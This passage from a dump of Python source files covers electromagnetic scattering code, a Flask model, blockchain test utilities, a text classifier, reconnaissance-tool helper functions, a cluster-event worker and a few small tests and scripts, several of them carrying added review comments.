    Output: Power scattered by non-concentric annulus
    as a function of omega

    Relies on module-level globals assumed to be defined earlier in this
    file: n, gamma, Conv, c, epD, ep0, factorial — TODO confirm.
    """
    # Metal permittivity (Drude-like, hard-coded plasma term 64).
    epM = 1 - 64/(omega*(omega + 1j*gamma))
    omega = omega*Conv  # convert to angular frequency
    k0 = omega/c        # free-space wavenumber
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1, np.size(n)):
        k_s = n[1:k_n+1]
        sum_k = 0
        # (removed the unused accumulator `sum_k_in` present in the original)
        for m in k_s:
            sum_k += factorial(k_n-1) * (1j*omega*g2/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                   factorial(k_n - m))
        a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
    #Calculate scattering coefficients as in ELS_slab_crescent.pdf
    b_n_2 = 1./\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
    #Calculate the radiative reaction term as in ELS_slab_radiative_reac
    a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
        / (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
        * np.ones(np.size(n))
    #Calculate scattering coefficient including radiative losses
    b_n = b_n_2 * (a_n_r + a_n_s)
    E_sca_squ = 2. / x0**2 * abs(np.sum(b_n*n))**2
    return (np.pi*k0*g2)**2 * omega/4 * ep0 * E_sca_squ
def Pow_sca_r(x0, x_e, c_e, g2, R0, R1, omega):
    """Calculate the power scattered by the non-concentric
    annulus. This is equivalent to the power absorbed by a
    fictive absorver in the concentric annulus frame.
    Output: Power scattered by non-concentric annulus
    as a function of omega

    Relies on module-level globals assumed to be defined earlier in this
    file: n, gamma, Conv, c, epD, ep0, factorial — TODO confirm.
    """
    # Metal permittivity (Drude-like, hard-coded plasma term 64).
    epM = 1 - 64/(omega*(omega + 1j*gamma))
    omega = omega*Conv  # convert to angular frequency
    k0 = omega/c        # free-space wavenumber
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1, np.size(n)):
        k_s = n[1:k_n+1]
        sum_k = 0
        # (removed the unused accumulator `sum_k_in` present in the original)
        for m in k_s:
            # NOTE(review): unlike Pow_sca_hori/Pow_abs_rad_hori this term
            # has no 1j factor in the base — confirm against the derivation.
            sum_k += factorial(k_n-1) * (omega*g2/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                   factorial(k_n - m))
        a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
    #Calculate scattering coefficients as in ELS_slab_crescent.pdf
    b_n_2 = 1./\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
    #Calculate the radiative reaction term as in ELS_slab_radiative_reac
    a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
        / (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
        * np.ones(np.size(n))
    #Calculate scattering coefficient including radiative losses
    b_n = b_n_2 * (a_n_r + a_n_s)
    E_sca_squ = 2. / x0**2 * abs(np.sum(b_n*n))**2
    return (np.pi*k0*g2)**2 * omega/4 * ep0 * E_sca_squ
if __name__ == "__main__":
    # Bugfix: the original used a Python-2 print statement; the call form
    # below is valid on both Python 2 and 3.
    print('Supposed to be called as a function, not main module')
| StarcoderdataPython |
5179522 | <reponame>DubstepWar/flask-blog-test<gh_stars>0
from app_blog.extensions import db, ma
import datetime as dt
class Category(db.Model):
    """SQLAlchemy model for a blog post category."""
    __tablename__ = "categories"
    # Surrogate primary key.
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Human-readable category name; must be unique.
    name = db.Column(db.String, nullable=False, unique=True)
    # Creation timestamp (naive UTC).
    created_at = db.Column(db.DateTime, default=dt.datetime.utcnow)
    # Refreshed automatically on every UPDATE (naive UTC).
    updated_at = db.Column(
        db.DateTime, default=dt.datetime.utcnow, onupdate=dt.datetime.utcnow
    )
    def __str__(self):
        """Display the category by its name."""
        return self.name
    def __repr__(self):
        """Unambiguous debug representation including the primary key."""
        return f"<Category id={self.id} name={self.name}>"
class CategorySchema(ma.SQLAlchemyAutoSchema):
    """Marshmallow schema auto-generated from the Category model.

    Bugfix: ``model`` must be declared on a nested ``Meta`` class.
    As a plain class attribute (the original code) it is ignored by
    SQLAlchemyAutoSchema and no fields are generated.
    """
    class Meta:
        model = Category
        # include_fk = True  # original (Russian) note was unsure why this
        #                      was here; left disabled — TODO confirm

# Ready-to-use schema instances for single objects and collections.
category_schema = CategorySchema()
categories_schema = CategorySchema(many=True)
| StarcoderdataPython |
176045 | """
This file is part of nucypher.
nucypher is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
nucypher is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with nucypher. If not, see <https://www.gnu.org/licenses/>.
"""
from twisted.logger import Logger
from constant_sorrow.constants import NO_BLOCKCHAIN_AVAILABLE
from typing import List
from umbral.keys import UmbralPrivateKey
from web3.middleware import geth_poa_middleware
from nucypher.blockchain.eth import constants
from nucypher.blockchain.eth.chains import Blockchain
from nucypher.utilities.sandbox.constants import (DEVELOPMENT_ETH_AIRDROP_AMOUNT,
DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK,
TEST_URSULA_INSECURE_DEVELOPMENT_PASSWORD)
def token_airdrop(token_agent, amount: int, origin: str, addresses: List[str]):
    """Transfer `amount` tokens from `origin` to every address in `addresses`.

    Each transfer is transacted and then waited on before the next one is
    issued; the receipts are returned in submission order.
    """
    receipts = []
    transfer = token_agent.contract.functions.transfer
    for recipient in addresses:
        tx_hash = transfer(recipient, amount).transact({'from': origin})
        receipts.append(token_agent.blockchain.wait_for_receipt(tx_hash))
    return receipts
class TesterBlockchain(Blockchain):
    """
    Blockchain subclass with additional test utility methods and options.
    """

    _instance = NO_BLOCKCHAIN_AVAILABLE
    _test_account_cache = list()

    def __init__(self, test_accounts=None, poa=True, airdrop=True, *args, **kwargs):
        """Connect to the test chain; optionally inject PoA middleware,
        generate extra unlocked accounts, and airdrop ETH to everyone."""
        super().__init__(*args, **kwargs)
        self.log = Logger("test-blockchain")  # type: Logger

        # For use with Proof-Of-Authority test-blockchains
        if poa is True:
            w3 = self.interface.w3
            w3.middleware_stack.inject(geth_poa_middleware, layer=0)

        # Generate additional ethereum accounts for testing
        enough_accounts = len(self.interface.w3.eth.accounts) >= DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK
        if test_accounts is not None and not enough_accounts:
            # NOTE(review): the pool is topped up to the *default* network
            # size, not to `test_accounts`, so the assert below only holds
            # when test_accounts == DEFAULT_... — confirm intent.
            accounts_to_make = DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK - len(self.interface.w3.eth.accounts)
            test_accounts = test_accounts if test_accounts is not None else DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK
            self.__generate_insecure_unlocked_accounts(quantity=accounts_to_make)
            assert test_accounts == len(self.interface.w3.eth.accounts)

        if airdrop is True:  # ETH for everyone!
            self.ether_airdrop(amount=DEVELOPMENT_ETH_AIRDROP_AMOUNT)

    @classmethod
    def sever_connection(cls) -> None:
        """Drop the cached singleton so a fresh blockchain can be created."""
        cls._instance = NO_BLOCKCHAIN_AVAILABLE

    def __generate_insecure_unlocked_accounts(self, quantity: int) -> List[str]:
        """
        Generate additional unlocked accounts transferring a balance to each account on creation.
        """
        addresses = list()
        # Bugfix: this assignment had been redacted to invalid syntax
        # ("<PASSWORD>"); restore it from the test constant imported above.
        insecure_passphrase = TEST_URSULA_INSECURE_DEVELOPMENT_PASSWORD
        for _ in range(quantity):
            umbral_priv_key = UmbralPrivateKey.gen_key()
            address = self.interface.w3.personal.importRawKey(private_key=umbral_priv_key.to_bytes(),
                                                              passphrase=insecure_passphrase)
            assert self.interface.unlock_account(address, password=insecure_passphrase, duration=None), 'Failed to unlock {}'.format(address)
            addresses.append(address)
            self._test_account_cache.append(address)
            self.log.info('Generated new insecure account {}'.format(address))
        return addresses

    def ether_airdrop(self, amount: int) -> List[str]:
        """Airdrops ether from creator address to all other addresses!"""
        coinbase, *addresses = self.interface.w3.eth.accounts
        tx_hashes = list()
        for address in addresses:
            tx = {'to': address, 'from': coinbase, 'value': amount}
            txhash = self.interface.w3.eth.sendTransaction(tx)
            _receipt = self.wait_for_receipt(txhash)
            tx_hashes.append(txhash)
            self.log.info("Airdropped {} ETH {} -> {}".format(amount, tx['from'], tx['to']))
        return tx_hashes

    def time_travel(self, hours: int=None, seconds: int=None, periods: int=None):
        """
        Wait the specified number of wait_hours by comparing
        block timestamps and mines a single block.
        """
        more_than_one_arg = sum(map(bool, (hours, seconds, periods))) > 1
        if more_than_one_arg:
            raise ValueError("Specify hours, seconds, or lock_periods, not a combination")

        if periods:
            duration = (constants.HOURS_PER_PERIOD * periods) * (60*60)
            base = constants.HOURS_PER_PERIOD * 60 * 60
        elif hours:
            duration = hours * (60*60)
            base = 60 * 60
        elif seconds:
            duration = seconds
            base = 1
        else:
            raise ValueError("Specify either hours, seconds, or lock_periods.")

        now = self.interface.w3.eth.getBlock(block_identifier='latest').timestamp
        # Round the destination timestamp down to a whole multiple of `base`.
        end_timestamp = ((now+duration)//base) * base
        self.interface.w3.eth.web3.testing.timeTravel(timestamp=end_timestamp)
        self.interface.w3.eth.web3.testing.mine(1)
        self.log.info("Time traveled to {}".format(end_timestamp))
| StarcoderdataPython |
import json
import os

import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import models
from tensorflow.keras.layers import Dense, Dropout, Embedding, Conv1D, MaxPooling1D, GlobalAveragePooling1D
from tensorflow.keras.preprocessing import sequence, text
# Load the labelled ticket dataset: column 0 is the text, column 1 the category.
data_set = pd.read_csv('Dataset.csv', header=None)
data_set.columns = ['Text', 'Category']

# 80/10/10 train/validation/test split, sampled without replacement.
train_set = data_set.sample(frac=0.8)
data_set.drop(train_set.index, axis=0, inplace=True)
valid_set = data_set.sample(frac=0.5)
data_set.drop(valid_set.index, axis=0, inplace=True)
test_set = data_set

# Label -> integer id mapping for the three ticket categories.
CLASSES = {'CPU_Utilization': 0, 'Password_Reset': 1, 'Memory_Utilization': 2}

# Hyper-parameters.
# Bugfix: the original value was corrupted to invalid syntax ("2<PASSWORD>0");
# 20000 is a plausible vocabulary cap — TODO confirm the intended value.
top_tokens = 20000
max_len = 50
filters = 64
dropout_rate = 0.2
embedding_dimension = 200
kernel_size = 3
pool_size = 3
def data_map(df):
    """Split a dataframe into (texts, integer labels) via the CLASSES mapping."""
    texts = list(df['Text'])
    labels = np.array(df['Category'].map(CLASSES))
    return texts, labels
# Materialise the three splits as (texts, labels) pairs.
train_text,train_labels = data_map(train_set)
valid_text,valid_labels=data_map(valid_set)
test_text,test_labels=data_map(test_set)
def embedding_matrix_conv(word_index, embedding_file_path, embedding_dimension, max_tokens=None):
    """Build the initial embedding matrix from a GloVe-style vectors file.

    Args:
        word_index: dict mapping word -> 1-based position (Keras Tokenizer).
        embedding_file_path: path to a text file of "word v1 v2 ..." lines.
        embedding_dimension: width of each embedding vector.
        max_tokens: vocabulary cap; defaults to the module-level `top_tokens`
            (new optional parameter — backward compatible).

    Returns:
        np.ndarray of shape (min(len(word_index) + 1, max_tokens),
        embedding_dimension); rows for words without a pre-trained vector
        (or beyond the cap) remain zero.
    """
    if max_tokens is None:
        max_tokens = top_tokens
    embeddings = {}
    with open(embedding_file_path, 'r') as embed_file:
        for token_entry in embed_file:
            values = token_entry.split()
            embeddings[values[0]] = np.asarray(values[1:], dtype='float32')
    num_words = min(len(word_index) + 1, max_tokens)
    embedding_matrix = np.zeros((num_words, embedding_dimension))
    for word, word_position in word_index.items():
        if word_position >= max_tokens:
            continue  # beyond the vocabulary cap
        embedding_vector = embeddings.get(word)
        if embedding_vector is not None:
            embedding_matrix[word_position] = embedding_vector
    return embedding_matrix
# Fit the tokenizer on the training texts only (no leakage from val/test).
tokenizer=text.Tokenizer (num_words=top_tokens)
tokenizer.fit_on_texts(train_text)
word_index=tokenizer.word_index
# Pre-trained GloVe 200-d embeddings file.
embedding_file_path = 'glove.6B.200d.txt'
def create_model():
    """Assemble and compile the 1-D CNN text classifier.

    GloVe-initialised (trainable) embedding -> dropout -> two Conv1D
    stages with max pooling in between -> global average pooling ->
    dropout -> softmax over the ticket categories.
    """
    vocabulary_size = min(len(word_index) + 1, top_tokens)
    pretrained = embedding_matrix_conv(word_index,
                                       embedding_file_path, embedding_dimension)
    layer_stack = [
        Embedding(input_dim=vocabulary_size,
                  output_dim=embedding_dimension,
                  input_length=max_len,
                  weights=[pretrained],
                  trainable=True),
        Dropout(rate=dropout_rate),
        Conv1D(filters=filters,
               kernel_size=kernel_size,
               activation='relu',
               bias_initializer='he_normal',
               padding='same'),
        MaxPooling1D(pool_size=pool_size),
        Conv1D(filters=filters * 2,
               kernel_size=kernel_size,
               activation='relu',
               bias_initializer='he_normal',
               padding='same'),
        GlobalAveragePooling1D(),
        Dropout(rate=dropout_rate),
        Dense(len(CLASSES), activation='softmax'),
    ]
    model = models.Sequential()
    for layer in layer_stack:
        model.add(layer)
    model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.001),
                  loss='sparse_categorical_crossentropy',
                  metrics=['acc'])
    return model
# Encode each split as padded integer sequences of length max_len.
train_process = tokenizer.texts_to_sequences(train_text)
train_process = sequence.pad_sequences(train_process, maxlen=max_len)
valid_process = tokenizer.texts_to_sequences(valid_text)
valid_process = sequence.pad_sequences(valid_process, maxlen=max_len)
test_process = tokenizer.texts_to_sequences(test_text)
test_process = sequence.pad_sequences(test_process, maxlen=max_len)

model = create_model()
model.summary()

# Checkpoint model weights after each epoch.
checkpoint_path = "training_path/cp.ckpt"
checkpoint_directory = os.path.dirname(checkpoint_path)
callback_path = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path, save_weights_only=True, verbose=1)

# NOTE(review): the *test* split is passed as validation_data even though a
# separate validation split exists — confirm this is intentional.
model.fit(train_process,
          train_labels,
          epochs=10,
          validation_data=(test_process,test_labels),
          callbacks=[callback_path])
model.save('model_saved/model')

# Dump one validation instance in the serving-request shape.
# NOTE(review): `json` is used here but never imported at the top of this
# file — confirm the import exists upstream.
input_dict={'embedding_9_input': valid_process[1:2]}
with open('sample_instance.json', 'w') as prediction_file:
    json.dump(input_dict, prediction_file)
def predictClass():
    """Classify a hard-coded sample ticket and return the result as JSON.

    On any failure the caught exception object itself is returned
    (original behaviour, preserved).
    """
    try:
        sample = ['User requested to Change Password as expired']
        result = {}
        encoded = tokenizer.texts_to_sequences(sample)
        encoded = sequence.pad_sequences(encoded, maxlen=max_len)
        trained_model = tf.keras.models.load_model('model_saved/model')
        predicted_id = int(trained_model.predict_classes(encoded))
        # Reverse-lookup the label for the predicted class id.
        for label, class_id in CLASSES.items():
            if class_id == predicted_id:
                category = label
        result["class"] = category
        return json.dumps({"results": result})
    except Exception as e:
        return e
if __name__=='__main__':
    # Ad-hoc smoke test: classify one sample ticket.
    predictClass()
| StarcoderdataPython |
3538619 | <reponame>joranbeasley/Raccoon
import os
import distutils.spawn
from collections import Counter
from subprocess import PIPE, check_call, CalledProcessError
from requests.exceptions import ConnectionError
from raccoon_src.utils.exceptions import RaccoonException, ScannerException, RequestHandlerException
from raccoon_src.utils.request_handler import RequestHandler
class HelpUtilities:
    """Assorted classmethod helpers for Raccoon: target health checks,
    argument validation, executable discovery and output-path handling."""

    PATH = ""  # base output directory, set by create_output_directory()

    @classmethod
    def validate_target_is_up(cls, host):
        """Ping the target; if ICMP seems blocked, fall back to an HTTP probe."""
        cmd = "ping -c 1 {}".format(host.target)
        try:
            check_call(cmd.split(), stdout=PIPE, stderr=PIPE)
            return
        except CalledProcessError:
            # Maybe ICMP is blocked. Try web server
            try:
                if host.port == 443 or host.port == 80:
                    url = "{}://{}".format(host.protocol, host.target)
                else:
                    url = "{}://{}:{}".format(host.protocol, host.target, host.port)
                rh = RequestHandler()
                rh.send("GET", url=url, timeout=15)
                return
            except (ConnectionError, RequestHandlerException):
                raise RaccoonException("Target {} seems to be down (no response to ping or from a web server"
                                       " at port {}).\nRun with --skip-health-check to ignore hosts"
                                       " considered as down.".format(host, host.port))

    @classmethod
    def validate_wordlist_args(cls, proxy_list, wordlist, subdomain_list):
        """Ensure every supplied wordlist/proxy-list path points to a real file."""
        if proxy_list and not os.path.isfile(proxy_list):
            raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
        if wordlist and not os.path.isfile(wordlist):
            raise FileNotFoundError("Not a valid file path, {}".format(wordlist))
        if subdomain_list and not os.path.isfile(subdomain_list):
            raise FileNotFoundError("Not a valid file path, {}".format(wordlist))

    @classmethod
    def validate_port_range(cls, port_range):
        """Validate a 'start-end' port range for an Nmap scan.

        Returns True when valid; raises ScannerException otherwise.
        Bugfix: non-numeric input previously escaped as a bare ValueError
        from int(); it now raises ScannerException like other invalid input.
        The convoluted `not len(ports) != 2` check was also simplified.
        """
        ports = port_range.split("-")
        try:
            valid = len(ports) == 2 and all(ports) and int(ports[-1]) <= 65535
        except ValueError:
            valid = False
        if valid:
            return True
        raise ScannerException("Invalid port range {}".format(port_range))

    @classmethod
    def validate_proxy_args(cls, *args):
        """No more than 1 of the following can be specified: tor_routing, proxy, proxy_list"""
        # Count how many of the mutually-exclusive proxy options are truthy.
        supplied_proxies = Counter((not arg for arg in (*args,))).get(False)
        if not supplied_proxies:
            return
        elif supplied_proxies > 1:
            raise RaccoonException("Must specify only one of the following:\n"
                                   "--tor-routing, --proxy-list, --proxy")

    @classmethod
    def determine_verbosity(cls, quiet):
        """Map the --quiet flag to a logging level name."""
        if quiet:
            return "CRITICAL"
        else:
            return "INFO"

    @classmethod
    def find_nmap_executable(cls):
        """Return the path to nmap, or None when not installed."""
        return distutils.spawn.find_executable("nmap")

    @classmethod
    def find_openssl_executable(cls):
        """Return the path to openssl, or None when not installed."""
        return distutils.spawn.find_executable("openssl")

    @classmethod
    def validate_executables(cls):
        """Raise RaccoonException unless both nmap and openssl are installed."""
        if not (cls.find_nmap_executable() and cls.find_openssl_executable()):
            raise RaccoonException("Could not find Nmap or OpenSSL "
                                   "installed. Please install them and run Raccoon again.")
        return

    @classmethod
    def create_output_directory(cls, outdir):
        """Tries to create base output directory"""
        cls.PATH = outdir
        try:
            os.mkdir(outdir)
        except FileExistsError:
            pass

    @classmethod
    def get_output_path(cls, module_path):
        """Join a module-relative path onto the base output directory."""
        return "{}/{}".format(cls.PATH, module_path)

    @classmethod
    def confirm_traffic_routs_through_tor(cls):
        """Verify via check.torproject.org that requests actually exit via Tor."""
        rh = RequestHandler()
        try:
            page = rh.send("GET", url="https://check.torproject.org")
            if "Congratulations. This browser is configured to use Tor." in page.text:
                return
            elif "Sorry. You are not using Tor" in page.text:
                raise RaccoonException("Traffic does not seem to be routed through Tor.\nExiting")
        except RequestHandlerException:
            raise RaccoonException("Tor service seems to be down - not able to connect to 127.0.0.1:9050.\nExiting")

    @classmethod
    def query_dns_dumpster(cls, host):
        """POST the target to dnsdumpster.com, handling its CSRF cookie dance."""
        # Start DNS Dumpster session for the token
        request_handler = RequestHandler()
        dnsdumpster_session = request_handler.get_new_session()
        url = "https://dnsdumpster.com"
        if host.naked:
            target = host.naked
        else:
            target = host.target
        payload = {
            "targetip": target,
            "csrfmiddlewaretoken": None
        }
        try:
            dnsdumpster_session.get(url, timeout=10)
            jar = dnsdumpster_session.cookies
            for c in jar:
                if not c.__dict__.get("name") == "csrftoken":
                    continue
                payload["csrfmiddlewaretoken"] = c.__dict__.get("value")
                break
            return dnsdumpster_session.post(url, data=payload, headers={"Referer": "https://dnsdumpster.com/"})
        except ConnectionError:
            raise RaccoonException

    @classmethod
    def extract_hosts_from_cidr(cls):
        # TODO: unimplemented stub in the original; kept for interface parity.
        pass

    @classmethod
    def extract_hosts_from_range(cls):
        # TODO: unimplemented stub in the original; kept for interface parity.
        pass
| StarcoderdataPython |
6502305 | <gh_stars>0
from dataclasses import dataclass
from typing import List
import queue
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
from utils import ErrorCounter, Changes, log, get_event_id, get_dict_hash
from storage import ClusterEventsStorage, ElasticsearchStorage
from events_scrape import InventoryClient
from sentry_sdk import capture_exception
from config import SentryConfig, EventStoreConfig
from assisted_service_client.rest import ApiException
EVENT_CATEGORIES = ["user", "metrics"]
@dataclass
class ClusterEventsWorkerConfig:
    """Settings and shared counters used by ClusterEventsWorker."""
    # Maximum number of threads used to process clusters concurrently.
    max_workers: int
    # Sentry error-reporting settings; exceptions are captured when enabled.
    sentry: SentryConfig
    # Shared counter incremented on unexpected per-cluster errors.
    error_counter: ErrorCounter
    # Shared change flag, set whenever a cluster is stored successfully.
    changes: Changes
    # Event-store settings (index names are read from EventStoreConfig
    # class attributes elsewhere — this field is not otherwise referenced
    # in the visible code; TODO confirm it is still needed).
    events: EventStoreConfig
class ClusterEventsWorker:
    """Processes clusters on a thread pool: fetches hosts/events from the
    assisted-service API and persists them to the cluster-events storage
    and to Elasticsearch (raw and normalized forms)."""

    def __init__(self, config: ClusterEventsWorkerConfig, ai_client: InventoryClient,
                 cluster_events_storage: ClusterEventsStorage, es_store: ElasticsearchStorage):
        # Bugfix: `self._es_store` was assigned twice in the original
        # constructor; a single assignment suffices.
        self._es_store = es_store
        self._ai_client = ai_client
        self.cluster_events_storage = cluster_events_storage
        self._config = config
        self._executor = None

    def process_clusters(self, clusters: List[dict]) -> None:
        """Submit every cluster for processing; blocks until all complete
        (the executor context manager waits on shutdown)."""
        with ThreadPoolExecutor(max_workers=self._config.max_workers) as self._executor:
            cluster_count = len(clusters)
            for cluster in clusters:
                self._executor.submit(self.store_events_for_cluster, cluster)
            log.info(f"Sent {cluster_count} clusters for processing...")

    def store_events_for_cluster(self, cluster: dict) -> None:
        """Fetch hosts/events for one cluster and persist them; errors are
        counted and reported, never propagated to the executor."""
        try:
            log.debug(f"Storing cluster: {cluster}")
            if "hosts" not in cluster or len(cluster["hosts"]) == 0:
                cluster["hosts"] = self.__get_hosts(cluster["id"])
            events = self.__get_events(cluster["id"])
            component_versions = self._ai_client.get_versions()
            self._store_normalized_events(component_versions, cluster, events)
            self.cluster_events_storage.store(component_versions, cluster, events)
            self._config.changes.set_changed()
            log.debug(f'Storing events for cluster {cluster["id"]}')
        except Exception as e:
            self.__handle_unexpected_error(e, f'Error while processing cluster {cluster["id"]}')

    def __get_events(self, cluster_id: str):
        """Return the cluster's events; a 404 yields an empty list."""
        events = []
        try:
            events = self._ai_client.get_events(cluster_id, categories=EVENT_CATEGORIES)
        except ApiException as e:
            if e.status != 404:
                raise e
            log.debug(f'Events for cluster {cluster_id} not found')
        return events

    def __get_hosts(self, cluster_id: str):
        """Return the cluster's hosts; a 404 yields an empty list."""
        hosts = []
        try:
            hosts = self._ai_client.get_cluster_hosts(cluster_id=cluster_id)
        except ApiException as e:
            if e.status != 404:
                raise e
            # If a cluster is not found, then we consider to have 0 hosts. It was probably deleted
            log.debug(f'Cluster {cluster_id} not found while retrieving hosts')
        return hosts

    def __handle_unexpected_error(self, e: Exception, msg: str):
        """Count, optionally report to Sentry, and log an unexpected error."""
        self._config.error_counter.inc()
        if self._config.sentry.enabled:
            capture_exception(e)
        log.exception(msg)

    def shutdown(self):
        """
        This is needed for python 3.8 and lower. With python 3.9 we can pass a parameter:
        self._executor.shutdown(wait=False, cancel_futures=True)
        """
        if self._executor:
            # Do not accept further tasks
            self._executor.shutdown(wait=False)
            self._drain_queue()

    def _drain_queue(self):
        """Cancel every queued-but-unstarted work item (reaches into the
        executor's private work queue — no public API exists pre-3.9)."""
        while True:
            try:
                work_item = self._executor._work_queue.get_nowait()  # pylint: disable=protected-access
            except queue.Empty:
                break
            if work_item:
                work_item.future.cancel()

    def _store_normalized_events(self, component_versions, cluster, event_list):
        """Write component versions, the cluster document and its events to
        their respective Elasticsearch indices, filtered by cluster id."""
        try:
            cluster_id_filter = {
                "term": {
                    "cluster_id": cluster["id"]
                }
            }
            self._es_store.store_changes(
                index=EventStoreConfig.COMPONENT_VERSIONS_EVENTS_INDEX,
                documents=[component_versions],
                id_fn=get_dict_hash,
                enrich_document_fn=add_timestamp
            )
            self._es_store.store_changes(
                index=EventStoreConfig.CLUSTER_EVENTS_INDEX,
                documents=[cluster],
                id_fn=get_dict_hash,
                filter_by=cluster_id_filter)
            self._es_store.store_changes(
                index=EventStoreConfig.EVENTS_INDEX,
                documents=event_list,
                id_fn=get_event_id,
                filter_by=cluster_id_filter)
        except Exception as e:
            self.__handle_unexpected_error(e, f'Error while storing normalized events for cluster {cluster["id"]}')
def add_timestamp(doc: dict) -> dict:
    """Stamp the document with the current UTC time (ISO-8601), in place,
    and return it for chaining."""
    doc.update({"timestamp": datetime.utcnow().isoformat()})
    return doc
| StarcoderdataPython |
8071535 | <filename>tests/unit/test_lazy.py<gh_stars>1-10
# import pytest
class Testcached_property:
    """Placeholder test suite for cached_property; bodies are synced from
    elsewhere (see '# synced' markers) and currently assert nothing."""
    def test___set_name__(self): # synced
        assert True
    def test___get__(self): # synced
        assert True
9731077 | <reponame>MaksHess/napari<filename>napari/_tests/test_sys_info.py
from napari.utils.info import sys_info
# vispy use_app tries to start Qt, which can cause segfaults when running
# sys_info on CI unless we provide a pytest Qt app
def test_sys_info(qapp):
    """sys_info() yields a plain-text report (no HTML tags, mentions
    plugins); with as_html=True the report contains HTML markup."""
    plain_report = sys_info()
    assert isinstance(plain_report, str)
    assert "Plugins" in plain_report
    for tag in ('<br>', '<b>'):
        assert tag not in plain_report

    html_report = sys_info(as_html=True)
    assert isinstance(html_report, str)
    for tag in ('<br>', '<b>'):
        assert tag in html_report
6562887 | <gh_stars>0
import scipy
import matplotlib.pyplot as plt
import scipy.io.wavfile
def _show_spectrogram(path):
    """Load a WAV file, print its sample rate and shape, and display its
    spectrogram (blocks until the plot window is closed)."""
    sample_rate, samples = scipy.io.wavfile.read(path)
    print(sample_rate, samples.shape)
    plt.specgram(samples, Fs=sample_rate)
    plt.show()

# Compare the noisy input, the noise reference, and the LMS-filtered output.
# (Refactor: the original repeated the same four statements three times.)
for _wav in ('signal_noise.wav', 'noise.wav', 'output_signal_lms.wav'):
    _show_spectrogram(_wav)
3255768 | import glob
import argparse
import math
import random
import os
import shutil
# Command-line interface: source directory of all training images and the
# fraction of them to hold out for validation.
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', type=str, default='/eva_data/zchin/cityscapes/all_train',
                    help='training image saving directory')  # fixed 'trainig' typo
parser.add_argument('--ratio', type=float, default=0.2, help='validation data ratio')
args = parser.parse_args()
if __name__ == '__main__':
    # Derive sibling train/ and val/ directories from the all_train/ root.
    train_dir = args.data_root.replace('all_train', 'train')
    val_dir = args.data_root.replace('all_train', 'val')
    if not os.path.isdir(train_dir):
        os.mkdir(train_dir)
        os.mkdir(val_dir)

    data_size = len(os.listdir(args.data_root))
    print(f'data size: {data_size}')
    valid_size = math.floor(data_size * args.ratio)

    img_list = [img_path for img_path in glob.glob(args.data_root + '/*')]
    # Perf fix: membership tests against a *list* of sampled indices made the
    # copy loop O(n^2); a set gives O(1) lookups.
    idx = set(random.sample(range(data_size), valid_size))
    for i, src_img_path in enumerate(img_list):
        img_name = src_img_path.split('/')[-1]
        if i in idx:
            dest_img_path = os.path.join(val_dir, img_name)
        else:
            dest_img_path = os.path.join(train_dir, img_name)
        shutil.copyfile(src_img_path, dest_img_path)

    # NOTE(review): all files are copied, but only *.jpg are counted here —
    # confirm the dataset contains only .jpg images.
    train_size = len(glob.glob1(train_dir, "*.jpg"))
    valid_size = len(glob.glob1(val_dir, "*.jpg"))
    print(f'train size: {train_size}\tvalid size: {valid_size}')
11222968 | from src.masonite.providers import StatusCodeProvider
from src.masonite.request import Request
from src.masonite.response import Response
from src.masonite.view import View
from src.masonite.app import App
from src.masonite.providers.StatusCodeProvider import ServerErrorExceptionHook
from src.masonite.testing import generate_wsgi
import unittest
class TestStatusCode(unittest.TestCase):
    """Tests for StatusCodeProvider against a minimal Masonite container."""
    def setUp(self):
        # Minimal IOC container: a status code, request/response pair and a
        # view renderer — everything the provider resolves in boot().
        self.app = App()
        self.app.bind('StatusCode', '404 Not Found')
        self.app.bind('Request', Request(None).load_app(self.app).load_environ(generate_wsgi()))
        self.app.simple(Response(self.app))
        self.app.bind('ViewClass', View(self.app))
        self.app.bind('View', self.app.make('ViewClass').render)
    def test_provider_returns_none_on_200_OK(self):
        # NOTE(review): the fixture binds a 404 status while the test name
        # says 200 OK — confirm the name matches the intended scenario.
        self.assertIsNone(StatusCodeProvider().load_app(self.app).boot())
class MockApplicationConfig:
    """Stand-in for the application config module; only DEBUG is read."""
    # NOTE(review): DEBUG is the *string* 'True' (always truthy), while a
